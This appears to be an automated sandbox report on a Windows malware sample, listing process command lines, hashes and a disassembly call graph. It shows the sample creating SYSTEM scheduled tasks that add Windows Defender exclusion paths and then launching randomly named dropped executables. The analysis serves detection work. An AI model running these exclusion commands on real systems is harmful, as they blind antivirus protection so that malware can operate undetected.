                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:19
                                                                                Start time:20:27:13
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff6a92c0000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:20
                                                                                Start time:20:27:13
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                Imagebase:0x7ff647250000
                                                                                File size:235'008 bytes
                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:21
                                                                                Start time:20:27:13
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:22
                                                                                Start time:20:27:13
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff75d280000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:23
                                                                                Start time:20:27:14
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                Imagebase:0x7ff6a92c0000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:24
                                                                                Start time:20:27:14
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:25
                                                                                Start time:20:27:14
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                                                                Imagebase:0x7ff647250000
                                                                                File size:235'008 bytes
                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:26
                                                                                Start time:20:27:14
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:SCHTASKS /Run /TN "Task1"
                                                                                Imagebase:0x7ff647250000
                                                                                File size:235'008 bytes
                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:27
                                                                                Start time:20:27:14
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff6a92c0000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:28
                                                                                Start time:20:27:14
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                Imagebase:0x7ff647250000
                                                                                File size:235'008 bytes
                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:29
                                                                                Start time:20:27:14
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:30
                                                                                Start time:20:27:14
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff75d280000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:31
                                                                                Start time:20:27:15
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                Imagebase:0x7ff6a92c0000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:32
                                                                                Start time:20:27:15
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:33
                                                                                Start time:20:27:15
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
                                                                                Imagebase:0x7ff647250000
                                                                                File size:235'008 bytes
                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:34
                                                                                Start time:20:27:15
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:SCHTASKS /Run /TN "Task1"
                                                                                Imagebase:0x7ff647250000
                                                                                File size:235'008 bytes
                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:35
                                                                                Start time:20:27:15
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff6a92c0000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:36
                                                                                Start time:20:27:15
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                Imagebase:0x7ff647250000
                                                                                File size:235'008 bytes
                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:37
                                                                                Start time:20:27:15
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:38
                                                                                Start time:20:27:15
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff75d280000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:39
                                                                                Start time:20:27:42
                                                                                Start date:09/01/2025
                                                                                Path:C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\bmaosk\bmaosk.exe"
                                                                                Imagebase:0x330000
                                                                                File size:54'152 bytes
                                                                                MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Antivirus matches:
                                                                                • Detection: 0%, ReversingLabs
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:40
                                                                                Start time:20:27:43
                                                                                Start date:09/01/2025
                                                                                Path:C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\bmaosk\bmaosk.exe"
                                                                                Imagebase:0x330000
                                                                                File size:54'152 bytes
                                                                                MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:41
                                                                                Start time:20:27:44
                                                                                Start date:09/01/2025
                                                                                Path:C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe"
                                                                                Imagebase:0x300000
                                                                                File size:54'152 bytes
                                                                                MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Antivirus matches:
                                                                                • Detection: 0%, ReversingLabs
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:42
                                                                                Start time:20:27:44
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:cmd /c echo.>c:\xxxx.ini
                                                                                Imagebase:0x790000
                                                                                File size:236'544 bytes
                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:43
                                                                                Start time:20:27:44
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:44
                                                                                Start time:20:27:45
                                                                                Start date:09/01/2025
                                                                                Path:C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe"
                                                                                Imagebase:0x300000
                                                                                File size:54'152 bytes
                                                                                MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:45
                                                                                Start time:20:27:45
                                                                                Start date:09/01/2025
                                                                                Path:C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\bmaosk\bmaosk.exe"
                                                                                Imagebase:0x330000
                                                                                File size:54'152 bytes
                                                                                MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:46
                                                                                Start time:20:28:01
                                                                                Start date:09/01/2025
                                                                                Path:C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe"
                                                                                Imagebase:0x300000
                                                                                File size:54'152 bytes
                                                                                MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:47
                                                                                Start time:20:28:01
                                                                                Start date:09/01/2025
                                                                                Path:C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\bmaosk\bmaosk.exe"
                                                                                Imagebase:0x330000
                                                                                File size:54'152 bytes
                                                                                MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:48
                                                                                Start time:20:28:09
                                                                                Start date:09/01/2025
                                                                                Path:C:\Program Files (x86)\5phaM8\5phaM8.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\5phaM8\5phaM8.exe"
                                                                                Imagebase:0x920000
                                                                                File size:54'152 bytes
                                                                                MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Antivirus matches:
                                                                                • Detection: 0%, ReversingLabs
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:49
                                                                                Start time:20:29:00
                                                                                Start date:09/01/2025
                                                                                Path:C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe"
                                                                                Imagebase:0x300000
                                                                                File size:54'152 bytes
                                                                                MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:50
                                                                                Start time:20:29:00
                                                                                Start date:09/01/2025
                                                                                Path:C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\bmaosk\bmaosk.exe"
                                                                                Imagebase:0x330000
                                                                                File size:54'152 bytes
                                                                                MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:51
                                                                                Start time:20:29:32
                                                                                Start date:09/01/2025
                                                                                Path:C:\ProgramData\kfbe6yYK.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\ProgramData\kfbe6yYK.exe
                                                                                Imagebase:0x1000000
                                                                                File size:1'589'760 bytes
                                                                                MD5 hash:ADFAC62AE0815EEFB205D73D9FEAC532
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:52
                                                                                Start time:20:29:40
                                                                                Start date:09/01/2025
                                                                                Path:C:\ProgramData\EsnjLDMo\9eYJWFQF.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\ProgramData\EsnjLDMo\9eYJWFQF.exe
                                                                                Imagebase:0x400000
                                                                                File size:486'832 bytes
                                                                                MD5 hash:66D1818C27C67B8BA01FE919E8ADCA5A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:53
                                                                                Start time:20:30:00
                                                                                Start date:09/01/2025
                                                                                Path:C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe"
                                                                                Imagebase:0x300000
                                                                                File size:54'152 bytes
                                                                                MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:54
                                                                                Start time:20:30:01
                                                                                Start date:09/01/2025
                                                                                Path:C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\bmaosk\bmaosk.exe"
                                                                                Imagebase:0x330000
                                                                                File size:54'152 bytes
                                                                                MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:2.1%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:32.3%
                                                                                  Total number of Nodes:458
                                                                                  Total number of Limit Nodes:10
                                                                                  execution_graph 14026 140005df3 14027 140005e71 14026->14027 14028 140005e84 CreateFileA 14027->14028 14029 140005f50 __CxxFrameHandler 14028->14029 14030 140005fc3 malloc ReadFile 14029->14030 15439 140007412 15440 140007333 15439->15440 15441 140007403 15440->15441 15442 1400073e0 LdrLoadDll 15440->15442 15442->15440 17401 7ff8bfb811b0 17409 7ff8bfb81209 17401->17409 17402 7ff8bfb81b90 51 API calls 17419 7ff8bfb81300 BuildCatchObjectHelperInternal 17402->17419 17403 7ff8bfb814f0 17429 7ff8bfb81a40 17403->17429 17404 7ff8bfb81b70 _log10_special 8 API calls 17408 7ff8bfb814d3 17404->17408 17406 7ff8bfb8129e 17410 7ff8bfb814f6 17406->17410 17420 7ff8bfb81b90 17406->17420 17407 7ff8bfb812c7 17411 7ff8bfb81b90 51 API calls 17407->17411 17409->17403 17409->17406 17409->17407 17412 7ff8bfb812b9 BuildCatchObjectHelperInternal 17409->17412 17409->17419 17432 7ff8bfb81110 17410->17432 17411->17412 17412->17402 17417 7ff8bfb814eb 17418 7ff8bfb879cc _invalid_parameter_noinfo_noreturn 47 API calls 17417->17418 17418->17403 17419->17404 17421 7ff8bfb81b9b 17420->17421 17422 7ff8bfb812b0 17421->17422 17423 7ff8bfb87a4c BuildCatchObjectHelperInternal 2 API calls 17421->17423 17425 7ff8bfb81bba 17421->17425 17422->17412 17422->17417 17423->17421 17424 7ff8bfb81bc5 17427 7ff8bfb81110 Concurrency::cancel_current_task 51 API calls 17424->17427 17425->17424 17438 7ff8bfb821f0 17425->17438 17428 7ff8bfb81bcb 17427->17428 17442 7ff8bfb81b34 17429->17442 17433 7ff8bfb8111e Concurrency::cancel_current_task 17432->17433 17434 7ff8bfb83990 Concurrency::cancel_current_task 2 API calls 17433->17434 17435 7ff8bfb8112f 17434->17435 17436 7ff8bfb8379c __std_exception_copy 49 API calls 17435->17436 17437 7ff8bfb81159 17436->17437 17439 7ff8bfb821fe Concurrency::cancel_current_task 17438->17439 17440 7ff8bfb83990 Concurrency::cancel_current_task 2 API calls 17439->17440 17441 7ff8bfb8220f 17440->17441 17447 7ff8bfb81ab0 17442->17447 17445 7ff8bfb83990 Concurrency::cancel_current_task 2 API calls 17446 7ff8bfb81b56 17445->17446 17448 7ff8bfb8379c __std_exception_copy 49 API calls 17447->17448 17449 7ff8bfb81ae4 17448->17449 17449->17445 15920 140013670 InitializeCriticalSection CreateEventW CreateEventW CreateEventW 15923 1400054e0 15920->15923 15922 1400136ef 15924 140005506 sprintf_s 15923->15924 15925 14000552c 15923->15925 15924->15922 15926 1400074d0 LdrLoadDll 15925->15926 15927 140005536 15926->15927 15928 140008370 3 API calls 15927->15928 15931 140005545 __CxxFrameHandler 15928->15931 15929 1400055b8 15930 140008de0 _lock 2 API calls 15929->15930 15932 1400055c0 sprintf_s 15930->15932 15931->15929 15933 1400074f0 LdrLoadDll 15931->15933 15932->15924 15934 140005561 CreateThread 15933->15934 15934->15932 15935 1400055b0 GetLastError 15934->15935 15935->15929 14035 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 14036 140005ab1 14035->14036 14037 140005add GetVersionExA 14035->14037 14038 140005abf 14036->14038 14085 140009540 14036->14085 14039 140005b0e GetProcessHeap HeapFree 14037->14039 14040 140005af0 GetProcessHeap HeapFree 14037->14040 14093 140009300 14038->14093 14045 140005b3c 14039->14045 14043 140005d0b 14040->14043 14044 140005ac9 14104 140008510 GetModuleHandleA 14044->14104 14108 14000a310 HeapCreate 14045->14108 14048 140005bec 14049 140005c12 14048->14049 14050 140005bf0 14048->14050 14052 140005c17 14049->14052 14051 140005bfe 14050->14051 14053 140009540 _lock 12 API calls 14050->14053 14054 140009300 _lock 10 API calls 14051->14054 14055 140005c3d 14052->14055 14057 140005c29 14052->14057 14059 140009540 _lock 12 API calls 14052->14059 14053->14051 14056 140005c08 14054->14056 14111 140009f50 GetStartupInfoA 14055->14111 14058 140008510 _lock 3 API calls 14056->14058 14060 140009300 _lock 10 API calls 14057->14060 14058->14049 14059->14057 14061 140005c33 14060->14061 14063 140008510 _lock 3 API calls 14061->14063 14063->14055 14065 140005c56 14131 140009e30 14065->14131 14068 140005c5b 14149 140009c30 14068->14149 14072 140005c73 14073 140005c81 14072->14073 14074 1400084e0 _lock 12 API calls 14072->14074 14179 140009690 14073->14179 14074->14073 14076 140005c86 14077 140005c94 14076->14077 14078 1400084e0 _lock 12 API calls 14076->14078 14191 140008650 14077->14191 14078->14077 14080 140005c9e 14081 1400084e0 _lock 12 API calls 14080->14081 14082 140005ca9 14080->14082 14081->14082 14195 140001520 14082->14195 14084 140005ad3 14084->14043 14090 14000954e _lock 14085->14090 14086 14000961c 14086->14038 14087 14000959c 14088 140009300 _lock 10 API calls 14087->14088 14088->14086 14089 1400095c9 GetStdHandle 14089->14087 14091 1400095dc 14089->14091 14090->14086 14090->14087 14090->14089 14091->14087 14092 1400095e2 WriteFile 14091->14092 14092->14087 14096 140009320 _lock 14093->14096 14094 140009330 14094->14044 14095 1400094dc GetStdHandle 14095->14094 14097 1400094ef 14095->14097 14096->14094 14096->14095 14099 140009375 _lock 14096->14099 14097->14094 14098 1400094f5 WriteFile 14097->14098 14098->14094 14099->14094 14100 1400093b9 GetModuleFileNameA 14099->14100 14101 1400093d9 _lock 14100->14101 14213 14000f000 14101->14213 14105 140008543 ExitProcess 14104->14105 14106 14000852a GetProcAddress 14104->14106 14106->14105 14107 14000853f 14106->14107 14107->14105 14109 14000a334 14108->14109 14110 14000a339 HeapSetInformation 14108->14110 14109->14048 14110->14048 14239 140008370 14111->14239 14113 140005c48 14113->14065 14124 1400084e0 14113->14124 14114 140008370 3 API calls 14118 140009f8a 14114->14118 14115 14000a1c4 GetStdHandle 14121 14000a17c 14115->14121 14116 14000a239 SetHandleCount 14116->14113 14117 14000a1d8 GetFileType 14117->14121 14118->14113 14118->14114 14119 14000a0e3 14118->14119 14118->14121 14119->14113 14120 14000a11c GetFileType 14119->14120 14119->14121 14244 14000edc0 14119->14244 14120->14119 14121->14113 14121->14115 14121->14116 14121->14117 14123 14000edc0 _lock 3 API calls 14121->14123 14123->14121 14125 140009540 _lock 12 API calls 14124->14125 14126 1400084ed 14125->14126 14127 140009300 _lock 10 API calls 14126->14127 14128 1400084f4 14127->14128 14129 1400073e0 _lock LdrLoadDll 14128->14129 14130 140008500 14129->14130 14132 140009e7c 14131->14132 14133 140009e3e GetCommandLineW 14131->14133 14134 140009e81 GetCommandLineW 14132->14134 14135 140009e69 14132->14135 14136 140009e49 GetCommandLineW 14133->14136 14137 140009e5e GetLastError 14133->14137 14134->14135 14138 140009e75 14135->14138 14139 140009e91 GetCommandLineA MultiByteToWideChar 14135->14139 14136->14137 14137->14135 14137->14138 14138->14068 14140 140009ec8 14139->14140 14141 140009ed9 14139->14141 14140->14068 14142 140008370 3 API calls 14141->14142 14143 140009eeb 14142->14143 14144 140009f32 14143->14144 14145 140009ef3 MultiByteToWideChar 14143->14145 14144->14068 14146 140009f13 14145->14146 14147 140009f2a 14145->14147 14146->14068 14258 140008de0 14147->14258 14150 140009c52 GetEnvironmentStringsW 14149->14150 14151 140009c86 14149->14151 14154 140009c6c GetLastError 14150->14154 14155 140009c60 14150->14155 14152 140009c91 GetEnvironmentStringsW 14151->14152 14153 140009c77 14151->14153 14152->14155 14171 140005c67 14152->14171 14156 140009d09 GetEnvironmentStrings 14153->14156 14153->14171 14154->14151 14154->14153 14263 140008300 14155->14263 14158 140009d17 14156->14158 14156->14171 14157 140009d58 14161 140008370 3 API calls 14157->14161 14158->14157 14160 140009d20 MultiByteToWideChar 14158->14160 14160->14158 14160->14171 14163 140009d68 14161->14163 14166 140009d7d 14163->14166 14167 140009d70 FreeEnvironmentStringsA 14163->14167 14164 140009ce1 __CxxFrameHandler 14169 140009cef FreeEnvironmentStringsW 14164->14169 14165 140009cd1 FreeEnvironmentStringsW 14165->14171 